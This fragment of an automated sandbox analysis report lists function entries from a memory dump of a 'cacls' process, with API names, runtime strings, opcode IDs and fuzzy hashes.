                                                            • Instruction Fuzzy Hash: 5C4107353007069FDB25DFA9C840B6AB7E5EF88710F140A9DF99ADB680DB31E805CB91
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0388728C
                                                            Strings
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03887294
                                                            • RTL: Re-Waiting, xrefs: 038872C1
                                                            • RTL: Resource at %p, xrefs: 038872A3
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: 7c2d5460556b5531dc25fd29b75365ff4ff9f347d3d6718fed039c99ae9930f6
                                                            • Instruction ID: 5fa139a2f723d5a5b5aba2c07c075b85f57f16b748eee10b33be7226f45a0e5b
                                                            • Opcode Fuzzy Hash: 7c2d5460556b5531dc25fd29b75365ff4ff9f347d3d6718fed039c99ae9930f6
                                                            • Instruction Fuzzy Hash: 5141033560024AABD711EFB8CC41B6AB7A5FB44714F240699F995DB640DB21E841C7D1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: 9c2c60ac1f108b9f15a83bfd4e063142b647da65f57920970a05d7fa6d164a5d
                                                            • Instruction ID: 6380ecadb85a61d255e6ad5134568adc20259ff8a5aaafe0e2ae0f01411ff591
                                                            • Opcode Fuzzy Hash: 9c2c60ac1f108b9f15a83bfd4e063142b647da65f57920970a05d7fa6d164a5d
                                                            • Instruction Fuzzy Hash: EF316676A102599FCF20DE7DCC40BEEB7B8EB44610F4445DAE849E7280EB30DA54CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: 0382ea60d47b78b08c9bc9bfdb872a06fb4dc3f89088065320478fc16ba6c64a
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: BB91C271E0031A9BDF24DEE9C880ABEB7A5AF44720F58859AFC65E72C0E7309940CB51
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: f31c1675fca03a7fdc3413b4c893549b913344d9144384a75b6034bd8152520c
                                                            • Instruction ID: 28992a0dfd8021b2ba95009fee1cc6b24fbb74253f212efb204f6609b364213b
                                                            • Opcode Fuzzy Hash: f31c1675fca03a7fdc3413b4c893549b913344d9144384a75b6034bd8152520c
                                                            • Instruction Fuzzy Hash: 80813875D002699BDB35DB94CC44BEAB7B8AB08710F0445EAE919F7280D7309E84CFA1